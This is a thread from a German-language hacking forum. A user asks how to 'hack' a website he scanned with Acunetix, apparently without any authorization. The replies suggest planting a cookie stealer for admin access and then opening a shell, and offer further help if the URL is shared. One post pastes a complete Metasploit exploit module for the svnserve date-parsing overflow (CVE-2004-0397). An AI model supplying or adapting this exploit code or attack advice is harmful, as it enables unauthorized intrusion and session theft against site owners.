Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

[S] Hilfe beim "Hacken"

- - - - -

  • Bitte melde dich an um zu Antworten
3 Antworten in diesem Thema

#1
S4W

S4W

    Leecher

  • Members
  • PIP
  • Likes
    0
  • 1 Beiträge
  • 0 Bedankt

Please Login HERE or Register HERE to see this link!



habe mit Acunetix eine seite abgescannt, wollte die nun eigentlich hacken, kann jedoch mit den Lücken nix anfangen.

Könnt mir jemand weiter helfen?

Gruß S4W

#2
Imperial

Imperial

    Favoured Management

  • Premium Member
  • Likes
    544
  • 421 Beiträge
  • 605 Bedankt
  • 340868
  • verifiziert
  • iPhone
  • Windows, Mac OS
1. Acunetix gibt so viele Falschmeldungen aus, dass es schon nicht mehr feierlich ist.
2. Kannst du mit den dort angezeigten Lücken nicht wirklich viel reißen.

Könntest höchstens probieren, nen Cookiestealer zu implementieren, sodass du Adminzugang bekommst.
Dann müsstest du noch ne Shell initialisieren und mit was Glück, kannst du die Seite dann hacken.

Aber wie gesagt, man muss erst einmal an die Cookies kommen.

There Is No Business Like Coding Business

 


#3
B1nary

B1nary

    Samurai

  • Elite Member
  • Likes
    489
  • 506 Beiträge
  • 346 Bedankt
Sind leider genau die gleichen nichtssagenden Meldungen wie bei ZAP. Wenn du uns die URL zeigst, kann dir der ein oder andere bestimmt besser helfen :)

#4
XoiL

XoiL

    Leecher

  • Banned
  • PIP
  • Likes
    2
  • 1 Beiträge
  • 14 Bedankt
  • Android [root], Blackberry
  • Linux

2. Kannst du mit den dort angezeigten Lücken nicht wirklich viel reißen.


Hallo
SVN? Memory Corruption? Evilcode?
beispiel :
##
# $Id: svnserve_date.rb 9971 2010-08-07 06:59:16Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/http/client'

class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking

include Msf::Exploit::Brute
include Msf::Exploit::Remote::Tcp

def initialize(info = {})
super(update_info(info,
'Name' => 'Subversion Date Svnserve',
'Description' => %q{
This is an exploit for the Subversion date parsing overflow. This
exploit is for the svnserve daemon (svn:// protocol) and will not work
for Subversion over webdav (http[s]://). This exploit should never
crash the daemon, and should be safe to do multi-hits.

**WARNING** This exploit seems to (not very often, I've only seen
it during testing) corrupt the subversion database, so be careful!
},
'Author' => 'spoonm',
'Version' => '$Revision: 9971 $',
'References' =>
[
['CVE', '2004-0397'],
['OSVDB', '6301'],
['BID', '10386'],
['URL', 'http://lists.netsys.com/pipermail/full-disclosure/2004-May/021737.html'],
['MIL', '68'],
],
'Payload' =>
{
'Space' => 500,
'BadChars' => "x00x09x0ax0bx0cx0dx20",
'MinNops' => 16,
},
'SaveRegisters' => [ 'esp' ],
'Arch' => 'x86',
'Platform' => [ 'linux', 'bsd' ],
'Targets' =>
[
[
'Linux Bruteforce',
{
'Platform' => 'linux',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0xbffffe13 },
'Stop' => { 'Ret' => 0xbfff0000 },
'Step' => 0
}
},
],
[
'FreeBSD Bruteforce',
{
'Platform' => 'bsd',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0xbfbffe13 },
'Stop' => { 'Ret' => 0xbfbf0000 },
'Step' => 0
}
},
],

],
'DisclosureDate' => 'May 19 2004'))

register_options(
[
Opt::RPORT(3690),
OptString.new('URL', [ true, "SVN URL (ie svn://host/repos)", "svn://host/svn/repos" ])
], self.class)

register_advanced_options(
[
# 62 on spoonm's, 88 on HD's
OptInt.new('RetLength', [ false, "Length of rets after payload", 100 ]),
OptBool.new('IgnoreErrors', [ false, "Ignore errors", false ])
], self.class)
end

def check
end

def brute_exploit(addresses)
connect

print_status("Trying #{"%.8x" % addresses['Ret']}...")

buffer = ([addresses['Ret']].pack('V') * (datastore['RetLength'] / 4).to_i) + payload.encoded

[
"( 2 ( edit-pipeline ) " + lengther(datastore['URL']) + " ) ",
"( ANONYMOUS ( 0; ) )",
"( get-dated-rev ( " + lengther(buffer + " 3 Oct 2000 01:01:01.001 (day 277, dst 1, gmt_off)") + " ) ) "
].each_with_index { |buf, index|
trash = sock.get_once

print_line("Received: #{trash}") if debugging?

if (sock.put(buf) || 0) == 0 and index < 3
print_error("Error transmitting buffer.")
raise ExploitError, "Failed to transmit data" if !datastore['IgnoreErrors']
end

if index == 3 and trash.length > 0
print_error("Received data when we shouldn't have")
raise ExploitError, "Received data when it wasn't expected" if !datastore['IgnoreErrors']
end
}

handler
disconnect
end

def lengther(buf)
"#{buf.length}:" + buf
end

end

Google SVN Manipulation oder sowas in der art

Lg



  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


This topic has been visited by 4 user(s)


    dorich75, Heinokel0903, Izon, Z3LuX
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.